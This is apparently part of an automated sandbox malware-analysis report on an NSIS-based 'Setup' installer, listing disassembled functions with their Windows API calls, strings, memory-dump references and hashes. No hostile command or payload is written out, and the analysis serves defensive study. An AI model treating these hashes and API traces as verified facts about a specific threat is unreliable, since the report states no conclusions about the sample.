                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                  • CloseHandle.KERNEL32(?), ref: 00407212
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                  • API String ID: 1916479912-1189179171
                                                                  • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                  • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                  • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                  • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                  Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                  • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                  • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                  • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                  • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406A73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                  • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 3581403547-1792361021
                                                                  • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                  • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                  • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                  • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                  Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                  Strings
                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                  • API String ID: 542301482-1377821865
                                                                  • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                  • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                  • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                  • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                  Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                  • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                  • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                  • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                  Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                  • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                  • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                  • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                  Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                  • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                  • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                    • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                  • GlobalFree.KERNEL32(?), ref: 00406509
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                  • API String ID: 20674999-2124804629
                                                                  • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                  • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                  • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                  • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                  Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                  • GetSysColor.USER32(?), ref: 004041DB
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                  • lstrlenW.KERNEL32(?), ref: 00404202
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                    • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                  • SendMessageW.USER32(00000000), ref: 0040427D
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                  • SetCursor.USER32(00000000), ref: 004042FE
                                                                  • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                  • SetCursor.USER32(00000000), ref: 00404322
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                  • String ID: F$N$open
                                                                  • API String ID: 3928313111-1104729357
                                                                  • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                  • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                  • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                  • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                  Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                  • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                  • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                  • wsprintfA.USER32 ref: 00406B79
                                                                  • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                  • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                  • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                  • API String ID: 565278875-3368763019
                                                                  • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                  • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                  • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                  • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                  • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                  • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                  • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                  • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                  Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                  • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                  • API String ID: 1641139501-220328614
                                                                  • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                  • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                  • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                  • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                  Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                  • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
